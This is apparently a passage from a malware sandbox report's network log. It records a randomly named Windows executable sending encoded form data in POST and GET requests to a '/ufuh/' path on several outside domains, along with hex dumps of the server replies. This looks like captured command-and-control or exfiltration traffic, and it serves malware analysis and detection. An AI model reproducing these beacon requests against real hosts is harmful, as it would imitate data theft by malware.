                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Vary: Accept-Encoding
                                                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                            Link: <https://jnkinteractive.co.kr/wp-json/>; rel="https://api.w.org/"
                                                                                            Content-Encoding: gzip
                                                                                            Data Raw: 62 66 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 bc 19 4b 6f e3 c6 f9 5c ff 0a 8a 41 6d 32 4b 52 94 ec f5 ba 94 b9 8b c4 f1 16 6d 37 dd 60 1f 28 8a b5 11 8c c8 a1 34 36 c5 61 66 86 96 5d ae 80 a0 58 14 45 11 f4 92 16 cd 21 39 14 68 d1 4b 80 16 45 0f 39 04 fd 41 5d e7 3f f4 9b 21 25 52 22 15 af 1d 27 b0 41 72 66 be d7 7c ef 19 ed 77 de 7b 7c f0 ec d7 1f 1c 6a 63 31 89 ef 6f ec cb 97 16 a3 64 e4 eb a7 d4 fe c5 13 5d ce 61 14 de df f8 d1 fe 04 0b a4 05 63 c4 38 16 be fe fc d9 43 7b 4f d7 ba 8b 95 04 4d b0 af 9f 11 3c 4d 29 13 ba 16 d0 44 e0 04 20 a7 24 14 63 3f c4 67 24 c0 b6 1a 58 1a 49 88 20 28 b6 79 80 62 ec f7 14 9d 1a 99 2d 46 87 54 f0 ad 05 91 ad 09 3a b7 c9 04 8d b0 9d 32 2c 99 78 31 62 23 bc a5 10 05 11 31 be ff cd 1f 3f bb fc e2 3f 97 ff f8 f8 f5 df bf d6 2e ff f5 df cb 2f 5e 69 97 bf ff 4c bb fc cb ef 2e bf f8 44 db 7c 6b af df eb 0d b4 d7 ff fc ea f2 b7 5f 6a 97 7f 7e f5 fa d5 97 af ff fa b9 76 f9 87 bf 5d 7e fe ea f2 df 5f ed 77 0b 42 1b fb 31 49 4e 35 86 63 7f 2b 4c b8 e4 18 61 11 8c b7 b4 31 [TRUNCATED]
                                                                                            Data Ascii: bfbKo\Am2KRm7`(46af]XE!9hKE9A]?!%R"'Arf|w{|jc1od]ac8C{OM<M)D $c?g$XI (yb-FT:2,x1b#1??./^iL.D|k_j~v]~_wB1IN5c+La1|[IrJ@0AP\3YQ$$4&&]IKRF__m2:?\/xc!R0,O>W_G,PT$Si'<Bd5_!9u$=FG]F3|UG:Q^^[:>lt3z _rL3`upqPB++m8NS$AWa3!sa:;>6owgcX7G8N%A-<k\&ggaK|Ija9CqG9p9y*(}9D~6pz$0i@!XSxH@Up-1JCph,L]pR>oa]L ;zN|;(0,2h>3/8HtG1^(GY3Qw^1.
                                                                                            May 2, 2024 08:29:31.296606064 CEST1289INData Raw: 0f 3a 3d af b3 4c 36 8c 50 ed 7b 5b 5f 5d 2a 88 d4 00 cc cd cd ce aa 64 3b f0 1c ee b8 f0 0c 76 ef d5 be fb b5 ef bb b5 6f dc 0e 7f 6f 65 27 3b 0b f6 35 e0 95 99 7e 63 e6 6e 63 06 5f 4d 07 58 9b 03 65 82 32 3b 14 36 a8 ed 54 ca 8c a3 5e 4d bc e1
                                                                                            Data Ascii: :=L6P{[_]*d;vooe';5~cnc_MXe2;6T^M~muu<&{(Yh$e+N1iL(~onrG@HV2GdzZ!XC/@7-34gnS'<dLr$`yPMu9]j
                                                                                            May 2, 2024 08:29:31.296611071 CEST878INData Raw: 57 c9 d4 6a ae ee 56 80 a6 18 5f 41 4d 1e 97 80 fd 32 b9 71 cf 19 23 6e 57 d1 67 8d fb 8d 99 ed c6 cc 4e 63 e6 6e 63 66 77 65 26 4f e1 00 24 f7 df 73 fa 77 f1 44 eb 3b db f7 e0 3d 2b 45 50 8a 2f b2 65 8c 23 f1 42 ed e0 6d 7f 0a 5e 2a a5 9e d0 10
                                                                                            Data Ascii: WjV_AM2q#nWgNcncfwe&O$swD;=+EP/e#Bm^*Fi50YpEPj@$PM%tn*[A@:7(gT@yAU,gO\gxBeb_j-WBFS;Ef$@e "I]*=g
                                                                                            May 2, 2024 08:29:31.296770096 CEST1289INData Raw: 65 34 64 0d 0a bc 5c 6d 6f e3 36 12 fe dc fe 0a 21 c1 a1 d1 1e 6d 48 94 2c cb 0e ee 70 68 8b c5 f5 c3 de 1d 6e d1 4f 87 c5 42 b6 e4 d8 a8 13 1b 7e d9 24 35 f2 df 6f 66 48 4a 14 45 bd 58 4a bb bb c9 da d4 cc 33 43 8a 9a 19 0e 87 2a c7 23 a2 e8 84
                                                                                            Data Ascii: e4d\mo6!mH,phnOB~$5ofHJEXJ3C*#x6(fD\;phRFrH`.gW0Z.;V.3U" j(]h!9v~ |Y$;L7].{{!*Mpom{-0
                                                                                            May 2, 2024 08:29:31.296777964 CEST1289INData Raw: d9 cf 1f 3f f2 1a aa bc de 0c e8 82 70 f2 53 1d da 09 13 28 82 ec 63 84 7f 0d b2 3c c8 ae 2c de f2 f5 9c ea 7f 4d c0 0d 6b f7 e4 2e 62 7e 38 85 c5 fb 94 f9 ae 03 0b 2a 68 bc f3 27 13 06 81 38 e7 a1 8b fb 09 10 ad d4 89 36 27 48 21 5b 9f 05 f5 f2
                                                                                            Data Ascii: ?pS(c<,Mk.b~8*h'86'H![0w{{1UeF5OG0&+'dUh,_%{SFM+Upx3Sh26i(99C}8?6 +9ou>xc`BjCfm u``
                                                                                            May 2, 2024 08:29:31.296869993 CEST1090INData Raw: e4 f6 40 3e 8e e5 66 52 98 b7 82 8b 4d e9 92 5d b1 c2 f3 62 40 74 01 5e 0b bc dc 22 af 18 17 bd f8 ad 6a 66 f4 ab 15 7c ed 1e fe 61 43 64 93 f1 fe 23 65 93 f2 87 0f 58 c9 8d e6 83 e7 6a df 85 87 37 fd 25 ee e6 a9 cd b3 aa bb b7 c5 f4 ee fd 1f d7
                                                                                            Data Ascii: @>fRM]b@t^"jf|aCd#eXj7%.: \|^}i# {|rVNXZBfT_B}ouNt{}^E61*/+K7p+A%P],^1[5xk=F'V9uv;
                                                                                            May 2, 2024 08:29:31.297812939 CEST1289INData Raw: 38 66 63 0d 0a ec 5d eb 8b dc 54 14 ff bc 03 fd 1f 2e 57 64 15 9a 64 92 79 ed d6 9d 51 ab 2d 14 5b 2a 15 f5 83 4a c9 24 99 dd b4 99 49 4c 32 9d ae b2 20 5a 44 2d 08 82 a2 1f aa 28 28 2a 0a 8a 54 e8 07 f1 0f 72 c6 ff c1 73 ce bd 79 4e e6 b5 6c dd
                                                                                            Data Ascii: 8fc]T.WddyQ-[*J$IL2 ZD-((*TrsyNlLr{WS@IOr"/3h<TLH>C_/B>OU@PLZ+*auBhg:n]Q}djv6_+dLaLz%M9%H1is4Kl;H
                                                                                            May 2, 2024 08:29:31.297836065 CEST1018INData Raw: d3 e4 47 47 47 db c0 42 6f 4f 7a b1 23 9e a1 b3 04 7e 30 0e ba 1c 1f 15 c5 8a 4c 7f fc 74 fa e1 7d 36 fb fc fe 5f 0f 7e e5 73 ad 25 e3 f7 fa f5 4c 71 39 89 fa c0 3b 2b 4a 03 44 87 06 cb ad 9b 30 65 27 73 f6 91 8a d5 57 33 5a 2a e6 ba e2 8c c6 57
                                                                                            Data Ascii: GGGBoOz#~0Lt}6_~s%Lq9;+JD0e'sW3Z*WGaB^~9h1sd{xA$T>.7>q}{tk2v5.4ow9{6*k">ZDprh#\e2vyGmcVN/O'vjZ(R+mC#B{vFp
                                                                                            May 2, 2024 08:29:31.299808025 CEST667INData Raw: 32 39 34 0d 0a 8c 5d bd 72 d3 40 10 ae e3 a7 58 44 21 39 c8 92 6d 60 06 c7 03 05 84 01 33 06 8a b8 8b 32 8c 1c 9f 13 19 23 27 ba 33 26 24 99 49 43 4f 41 41 c9 23 a4 a4 e1 85 20 bc 03 df ae 14 59 96 95 0c 8d e5 3b ed dd ed b7 7f b7 37 da 91 f2 c7
                                                                                            Data Ascii: 294]r@XD!9m`32#'3&$ICOAA# Y;7+h56c@}PDXF8nysdiC6MuTGCL_a2=!)c)0mhHaa(Sf1}#Qfy0^(outEoxP!
                                                                                            May 2, 2024 08:29:31.299817085 CEST20INData Raw: 61 0d 0a 03 00 4d c4 a4 e3 5f a2 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: aM_0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            32192.168.2.2249196183.111.183.31802848C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            May 2, 2024 08:29:33.535666943 CEST2578OUTPOST /ufuh/ HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Content-Length: 3623
                                                                                            Cache-Control: no-cache
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: www.jnkinteractive.co.kr
                                                                                            Origin: http://www.jnkinteractive.co.kr
                                                                                            Referer: http://www.jnkinteractive.co.kr/ufuh/
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                            Data Raw: 70 6c 3d 4a 5a 4b 78 62 51 54 58 56 47 71 65 44 31 4c 7a 4d 4a 2b 61 33 72 6c 78 30 4b 71 50 56 35 59 42 6f 59 6c 78 47 34 6b 57 6d 75 48 42 4e 62 77 65 43 62 49 4f 50 41 4d 37 67 75 4d 61 46 79 68 52 48 61 6f 6b 48 4b 30 4b 68 71 79 77 79 52 32 54 51 65 79 74 73 51 43 53 43 4d 6c 50 75 67 51 58 32 4f 66 6c 71 2b 48 2b 39 72 7a 4d 38 62 61 33 49 39 73 34 31 71 5a 45 6e 65 52 72 33 77 42 4d 47 50 32 33 38 4d 55 52 42 57 71 30 79 6d 2f 55 74 30 38 53 4e 79 53 58 41 69 44 50 39 47 4d 64 44 4a 6e 61 53 37 64 70 30 67 6a 6d 33 48 7a 70 34 73 7a 31 38 53 62 68 51 50 79 53 2b 73 44 55 64 39 58 38 79 4d 51 64 45 43 51 51 44 44 32 79 4a 65 33 7a 65 4e 31 4f 37 43 48 43 67 54 32 55 63 41 32 35 62 43 67 34 36 65 73 73 50 72 66 46 34 4c 65 65 65 70 6d 54 58 6f 62 61 51 38 58 51 4f 6f 50 69 54 69 47 2f 68 44 4e 55 59 53 41 32 43 70 7a 4d 2b 61 59 36 51 4f 43 53 5a 78 51 6a 32 6d 71 39 44 56 6c 57 74 4a 53 62 79 6c 5a 77 57 48 38 76 7a 38 58 59 56 59 62 57 4a 45 69 4d 77 6c 32 67 55 71 33 42 42 71 4f 4e 37 51 61 [TRUNCATED]
                                                                                            Data Ascii: pl=JZKxbQTXVGqeD1LzMJ+a3rlx0KqPV5YBoYlxG4kWmuHBNbweCbIOPAM7guMaFyhRHaokHK0KhqywyR2TQeytsQCSCMlPugQX2Oflq+H+9rzM8ba3I9s41qZEneRr3wBMGP238MURBWq0ym/Ut08SNySXAiDP9GMdDJnaS7dp0gjm3Hzp4sz18SbhQPyS+sDUd9X8yMQdECQQDD2yJe3zeN1O7CHCgT2UcA25bCg46essPrfF4LeeepmTXobaQ8XQOoPiTiG/hDNUYSA2CpzM+aY6QOCSZxQj2mq9DVlWtJSbylZwWH8vz8XYVYbWJEiMwl2gUq3BBqON7Qap5B0z0rOMke04x15P+7km3KTnCj4SMG64KSr9XvgxeWD4RSpdivuYyvcgoHxVQTonY5Q8F3bczy/hS7nR9RgCEknsjN/vntW18x+nQC5Ej0P83rupIpRB9RzzzAdMdFUDJzg4cKMc7GNwKAAalgpD+ThRFRVZ5oEwUtkpNLzN8/TpgURrRArvjqg60aZ24mHnhaI+FpBnyeKssKowrpo0yinTB1Cdeu63EFF5ET9FEX84LHG+pFOwz/NNmPOF8i3b9afYo3xLnXocWJWcVjfc0S9rhwoRaiceioY6BhBSj6Ns9p8bj31wjEr0nrkizU++oxMRo3pJTZ1NHOK/GfuC2UU8/ZxU2p/6kgp3lgBh3TkimmrxwH4RA8Z2gUIIrwgEKnkxLSh4GGQBgi29rAS8OVPHvjOLXzvMUs/HRawHoRRseJiFagoCCZHzdGbs2wjmkqZJ3eo0ZgynLT9Lx74E2JLl97eUDsKnkZu8lO34xSn1yTEEy+qIb5WwD2QxcitxkwFVyjp2/KJQY0dHC9/mzyTHNg2YS5BoH6VOqeoUcqJy+hKU5FqRLe9dW6GOyfA9NDRfrr7r3r4oytxyIzKnLPOQLgV5CjP1cSOL4LSD21aRw6YQ3PbX6wDRUqOqAkfsG+xHUsPeOB2DudEjVN8NOOS3pPBAYfk4Z [TRUNCATED]
                                                                                            May 2, 2024 08:29:33.813353062 CEST1591OUTData Raw: 4d 73 59 59 46 6f 39 4f 38 4f 66 77 66 31 33 30 65 63 43 2f 43 56 2b 4e 32 67 63 31 41 6b 6d 4d 6e 73 73 46 74 45 43 31 30 32 75 46 30 34 4a 71 63 36 4b 32 36 75 6c 6d 4c 6d 31 50 69 6a 41 77 58 79 5a 54 54 57 46 44 71 71 6c 34 71 53 45 33 4b 69
                                                                                            Data Ascii: MsYYFo9O8Ofwf130ecC/CV+N2gc1AkmMnssFtEC102uF04Jqc6K26ulmLm1PijAwXyZTTWFDqql4qSE3KiUwoYvW62JKi2ng5f2YFnGIJhASbPq3WZ6vP/czk2fAf9MQQgwn+ksfL65loXOYcdZ7+Mk+LZ1UKQdPRn0qGggmHSS7n9PI03A79pgbrwEdsGznbIf5YOX52VEFFDmirfI4DJ4nHgR8HtGqOjsli6sioJ3urEgxdM8
                                                                                            May 2, 2024 08:29:34.374264002 CEST1289INHTTP/1.1 404 Not Found
                                                                                            Server: openresty
                                                                                            Date: Thu, 02 May 2024 06:29:34 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Vary: Accept-Encoding
                                                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                            Link: <https://jnkinteractive.co.kr/wp-json/>; rel="https://api.w.org/"
                                                                                            Content-Encoding: gzip
                                                                                            Data Raw: 62 66 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 bc 19 4b 6f e3 c6 f9 5c ff 0a 8a 41 6d 32 4b 52 94 ec f5 ba 94 b9 8b c4 f1 16 6d 37 dd 60 1f 28 8a b5 11 8c c8 a1 34 36 c5 61 66 86 96 5d ae 80 a0 58 14 45 11 f4 92 16 cd 21 39 14 68 d1 4b 80 16 45 0f 39 04 fd 41 5d e7 3f f4 9b 21 25 52 22 15 af 1d 27 b0 41 72 66 be d7 7c ef 19 ed 77 de 7b 7c f0 ec d7 1f 1c 6a 63 31 89 ef 6f ec cb 97 16 a3 64 e4 eb a7 d4 fe c5 13 5d ce 61 14 de df f8 d1 fe 04 0b a4 05 63 c4 38 16 be fe fc d9 43 7b 4f d7 ba 8b 95 04 4d b0 af 9f 11 3c 4d 29 13 ba 16 d0 44 e0 04 20 a7 24 14 63 3f c4 67 24 c0 b6 1a 58 1a 49 88 20 28 b6 79 80 62 ec f7 14 9d 1a 99 2d 46 87 54 f0 ad 05 91 ad 09 3a b7 c9 04 8d b0 9d 32 2c 99 78 31 62 23 bc a5 10 05 11 31 be ff cd 1f 3f bb fc e2 3f 97 ff f8 f8 f5 df bf d6 2e ff f5 df cb 2f 5e 69 97 bf ff 4c bb fc cb ef 2e bf f8 44 db 7c 6b af df eb 0d b4 d7 ff fc ea f2 b7 5f 6a 97 7f 7e f5 fa d5 97 af ff fa b9 76 f9 87 bf 5d 7e fe ea f2 df 5f ed 77 0b 42 1b fb 31 49 4e 35 86 63 7f 2b 4c b8 e4 18 61 11 8c b7 b4 31 [TRUNCATED]
                                                                                            Data Ascii: bfbKo\Am2KRm7`(46af]XE!9hKE9A]?!%R"'Arf|w{|jc1od]ac8C{OM<M)D $c?g$XI (yb-FT:2,x1b#1??./^iL.D|k_j~v]~_wB1IN5c+La1|[IrJ@0AP\3YQ$$4&&]IKRF__m2:?\/xc!R0,O>W_G,PT$Si'<Bd5_!9u$=FG]F3|UG:Q^^[:>lt3z _rL3`upqPB++m8NS$AWa3!sa:;>6owgcX7G8N%A-<k\&ggaK|Ija9CqG9p9y*(}9D~6pz$0i@!XSxH@Up-1JCph,L]pR>oa]L ;zN|;(0,2h>3/8HtG1^(GY3Qw^1.
                                                                                            May 2, 2024 08:29:34.374315023 CEST1289INData Raw: 0f 3a 3d af b3 4c 36 8c 50 ed 7b 5b 5f 5d 2a 88 d4 00 cc cd cd ce aa 64 3b f0 1c ee b8 f0 0c 76 ef d5 be fb b5 ef bb b5 6f dc 0e 7f 6f 65 27 3b 0b f6 35 e0 95 99 7e 63 e6 6e 63 06 5f 4d 07 58 9b 03 65 82 32 3b 14 36 a8 ed 54 ca 8c a3 5e 4d bc e1
                                                                                            Data Ascii: :=L6P{[_]*d;vooe';5~cnc_MXe2;6T^M~muu<&{(Yh$e+N1iL(~onrG@HV2GdzZ!XC/@7-34gnS'<dLr$`yPMu9]j
                                                                                            May 2, 2024 08:29:34.374469995 CEST878INData Raw: 57 c9 d4 6a ae ee 56 80 a6 18 5f 41 4d 1e 97 80 fd 32 b9 71 cf 19 23 6e 57 d1 67 8d fb 8d 99 ed c6 cc 4e 63 e6 6e 63 66 77 65 26 4f e1 00 24 f7 df 73 fa 77 f1 44 eb 3b db f7 e0 3d 2b 45 50 8a 2f b2 65 8c 23 f1 42 ed e0 6d 7f 0a 5e 2a a5 9e d0 10
                                                                                            Data Ascii: WjV_AM2q#nWgNcncfwe&O$swD;=+EP/e#Bm^*Fi50YpEPj@$PM%tn*[A@:7(gT@yAU,gO\gxBeb_j-WBFS;Ef$@e "I]*=g
                                                                                            May 2, 2024 08:29:34.374577045 CEST1289INData Raw: 65 34 64 0d 0a bc 5c 6d 6f e3 36 12 fe dc fe 0a 21 c1 a1 d1 1e 6d 48 94 2c cb 0e ee 70 68 8b c5 f5 c3 de 1d 6e d1 4f 87 c5 42 b6 e4 d8 a8 13 1b 7e d9 24 35 f2 df 6f 66 48 4a 14 45 bd 58 4a bb bb c9 da d4 cc 33 43 8a 9a 19 0e 87 2a c7 23 a2 e8 84
                                                                                            Data Ascii: e4d\mo6!mH,phnOB~$5ofHJEXJ3C*#x6(fD\;phRFrH`.gW0Z.;V.3U" j(]h!9v~ |Y$;L7].{{!*Mpom{-0
                                                                                            May 2, 2024 08:29:34.374650955 CEST1289INData Raw: d9 cf 1f 3f f2 1a aa bc de 0c e8 82 70 f2 53 1d da 09 13 28 82 ec 63 84 7f 0d b2 3c c8 ae 2c de f2 f5 9c ea 7f 4d c0 0d 6b f7 e4 2e 62 7e 38 85 c5 fb 94 f9 ae 03 0b 2a 68 bc f3 27 13 06 81 38 e7 a1 8b fb 09 10 ad d4 89 36 27 48 21 5b 9f 05 f5 f2
                                                                                            Data Ascii: ?pS(c<,Mk.b~8*h'86'H![0w{{1UeF5OG0&+'dUh,_%{SFM+Upx3Sh26i(99C}8?6 +9ou>xc`BjCfm u``
                                                                                            May 2, 2024 08:29:34.374814034 CEST1090INData Raw: e4 f6 40 3e 8e e5 66 52 98 b7 82 8b 4d e9 92 5d b1 c2 f3 62 40 74 01 5e 0b bc dc 22 af 18 17 bd f8 ad 6a 66 f4 ab 15 7c ed 1e fe 61 43 64 93 f1 fe 23 65 93 f2 87 0f 58 c9 8d e6 83 e7 6a df 85 87 37 fd 25 ee e6 a9 cd b3 aa bb b7 c5 f4 ee fd 1f d7
                                                                                            Data Ascii: @>fRM]b@t^"jf|aCd#eXj7%.: \|^}i# {|rVNXZBfT_B}ouNt{}^E61*/+K7p+A%P],^1[5xk=F'V9uv;
                                                                                            May 2, 2024 08:29:34.375437975 CEST1289INData Raw: 38 66 63 0d 0a ec 5d eb 8b dc 54 14 ff bc 03 fd 1f 2e 57 64 15 9a 64 92 79 ed d6 9d 51 ab 2d 14 5b 2a 15 f5 83 4a c9 24 99 dd b4 99 49 4c 32 9d ae b2 20 5a 44 2d 08 82 a2 1f aa 28 28 2a 0a 8a 54 e8 07 f1 0f 72 c6 ff c1 73 ce bd 79 4e e6 b5 6c dd
                                                                                            Data Ascii: 8fc]T.WddyQ-[*J$IL2 ZD-((*TrsyNlLr{WS@IOr"/3h<TLH>C_/B>OU@PLZ+*auBhg:n]Q}djv6_+dLaLz%M9%H1is4Kl;H
                                                                                            May 2, 2024 08:29:34.375592947 CEST1018INData Raw: d3 e4 47 47 47 db c0 42 6f 4f 7a b1 23 9e a1 b3 04 7e 30 0e ba 1c 1f 15 c5 8a 4c 7f fc 74 fa e1 7d 36 fb fc fe 5f 0f 7e e5 73 ad 25 e3 f7 fa f5 4c 71 39 89 fa c0 3b 2b 4a 03 44 87 06 cb ad 9b 30 65 27 73 f6 91 8a d5 57 33 5a 2a e6 ba e2 8c c6 57
                                                                                            Data Ascii: GGGBoOz#~0Lt}6_~s%Lq9;+JD0e'sW3Z*WGaB^~9h1sd{xA$T>.7>q}{tk2v5.4ow9{6*k">ZDprh#\e2vyGmcVN/O'vjZ(R+mC#B{vFp
                                                                                            May 2, 2024 08:29:34.379626989 CEST667INData Raw: 32 39 34 0d 0a 8c 5d bd 72 d3 40 10 ae e3 a7 58 44 21 39 c8 92 6d 60 06 c7 03 05 84 01 33 06 8a b8 8b 32 8c 1c 9f 13 19 23 27 ba 33 26 24 99 49 43 4f 41 41 c9 23 a4 a4 e1 85 20 bc 03 df ae 14 59 96 95 0c 8d e5 3b ed dd ed b7 7f b7 37 da 91 f2 c7
                                                                                            Data Ascii: 294]r@XD!9m`32#'3&$ICOAA# Y;7+h56c@}PDXF8nysdiC6MuTGCL_a2=!)c)0mhHaa(Sf1}#Qfy0^(outEoxP!
                                                                                            May 2, 2024 08:29:34.379844904 CEST20INData Raw: 61 0d 0a 03 00 4d c4 a4 e3 5f a2 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: aM_0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            33192.168.2.2249197183.111.183.31802848C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            May 2, 2024 08:29:36.365324974 CEST473OUTGET /ufuh/?pl=EbiRYmriZV7/HiPUOKeH2YEx7MyTQrgkk6gsaa5XxsDKCOU8Ma1/AS5omL8UMRh4O9IVNf1Nsq6o0EG0WMSPhA6OEupR23w6ucrxxNSq0Kjb577lAvo9ttp2iO4V&5h1t=6H6PKFvXjtI4u8k HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                            Connection: close
                                                                                            Host: www.jnkinteractive.co.kr
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                            May 2, 2024 08:29:36.928196907 CEST511INHTTP/1.1 301 Moved Permanently
                                                                                            Server: openresty
                                                                                            Date: Thu, 02 May 2024 06:29:36 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 0
                                                                                            Connection: close
                                                                                            Vary: Accept-Encoding,Cookie
                                                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                            X-Redirect-By: WordPress
                                                                                            Location: http://jnkinteractive.co.kr/ufuh/?pl=EbiRYmriZV7/HiPUOKeH2YEx7MyTQrgkk6gsaa5XxsDKCOU8Ma1/AS5omL8UMRh4O9IVNf1Nsq6o0EG0WMSPhA6OEupR23w6ucrxxNSq0Kjb577lAvo9ttp2iO4V&5h1t=6H6PKFvXjtI4u8k


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            34192.168.2.2249198208.91.197.13802848C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            May 2, 2024 08:29:50.568864107 CEST2440OUTPOST /ufuh/ HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Content-Length: 2159
                                                                                            Cache-Control: no-cache
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: www.riveramayahousing.com
                                                                                            Origin: http://www.riveramayahousing.com
                                                                                            Referer: http://www.riveramayahousing.com/ufuh/
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                            Data Raw: 70 6c 3d 4d 45 41 73 2f 39 4c 63 37 41 64 71 42 6b 46 6c 4d 6e 39 70 56 56 41 30 38 78 4f 44 4b 52 2f 72 2b 37 67 47 2f 75 65 31 37 6e 6b 44 46 41 48 75 4c 34 54 33 6b 44 4b 4f 34 75 6a 41 63 32 41 68 65 4f 37 78 42 49 4f 55 71 79 4c 72 79 34 34 41 32 33 61 6d 57 45 6f 45 59 45 68 46 7a 4d 53 66 6f 64 41 38 4e 42 46 4d 67 49 6e 43 48 52 63 41 37 4c 47 76 46 76 66 42 2f 68 58 4a 64 77 37 5a 31 5a 72 76 79 43 36 4e 62 65 4a 42 34 6b 32 71 67 53 38 6a 30 51 66 67 30 42 49 58 74 39 71 65 42 78 33 30 54 47 4c 31 66 48 6e 59 32 79 57 77 39 48 41 74 59 43 6c 44 6b 65 55 50 46 72 68 77 33 53 6f 30 6f 46 75 57 7a 6e 43 75 76 4f 6c 66 36 45 66 74 41 7a 33 35 64 4e 4e 2b 43 4a 58 73 36 46 7a 6c 64 41 33 34 73 52 32 50 6a 72 70 64 73 38 75 59 32 5a 6b 4b 57 62 41 46 64 5a 51 63 64 71 31 70 65 54 49 30 56 6a 6a 38 65 4a 6d 4a 35 56 4e 4e 70 43 35 34 45 66 42 4b 51 5a 2b 6e 43 72 42 4a 71 4d 74 64 6d 72 67 43 6a 38 49 68 76 43 42 76 6f 6d 59 4e 68 66 51 74 4b 31 39 49 34 43 53 49 6c 38 58 52 71 43 6d 77 43 72 48 [TRUNCATED]
                                                                                            Data Ascii: pl=MEAs/9Lc7AdqBkFlMn9pVVA08xODKR/r+7gG/ue17nkDFAHuL4T3kDKO4ujAc2AheO7xBIOUqyLry44A23amWEoEYEhFzMSfodA8NBFMgInCHRcA7LGvFvfB/hXJdw7Z1ZrvyC6NbeJB4k2qgS8j0Qfg0BIXt9qeBx30TGL1fHnY2yWw9HAtYClDkeUPFrhw3So0oFuWznCuvOlf6EftAz35dNN+CJXs6FzldA34sR2Pjrpds8uY2ZkKWbAFdZQcdq1peTI0Vjj8eJmJ5VNNpC54EfBKQZ+nCrBJqMtdmrgCj8IhvCBvomYNhfQtK19I4CSIl8XRqCmwCrHzHo+s5T0jZPi+O2OKNAobw/kDtzi3mN//R3Jy2cwouDAe93WfRemlaAp3P6by+1EzBbKYwJyKUtR4bOKV1tc0X4yfo9DgaAYvFIZ4f364PePFyhHUe7ugE7ssBqM6TatOFwMZ3kgnzvHG+ZBnVpnulR+RSlQmFxQVtTxoZ54FtAkYhI7Un207k1MC+VIIpLV8ZbfAtmeyXRsK+5UOy/rTa/wYGwp5W+GWbbOcUDlc+wkkl/bpGlyMDtsBSlkSy1YtmbHgONAJVHEfcgcMsTXXiTtWNF98tMHRtDISEU6UbtRwpm0xPTtoTZ60bb7odInlab8fbAPlzXWUP+GWBLcVC10L0UIWPX5nfp+57eCVJU9MfgGFjI1AGQ9lTdazr9sbkmk2rrSgmTh2RBDcuoWUl+03PqhAC4yDbYgoocQJHvjAkqNnbnpDRdI1DgojRtMxQugcy5h/NtxNCcLCDslJLE8R6hMSXMdspqOZBLOx5g6O2RDJWRNUibTwh62stVLBYCcyua4co4hua1pOovR4cAZKFG8bCBb5/CSdOiCa0iArlm5dx23yUe8Lshqy+2TXh8zXgonRU4ewj/DIJ6hgQ1y5IRPFS2oOSorgXEwvRY7lDWwx8s6xNO+HTmyLZqyXl4jh2XgykwhOLqrPsPxoqF31n2j2QvNn5 [TRUNCATED]


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            35192.168.2.2249199208.91.197.13802848C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            May 2, 2024 08:29:53.182307005 CEST747OUTPOST /ufuh/ HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Content-Length: 199
                                                                                            Cache-Control: no-cache
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: www.riveramayahousing.com
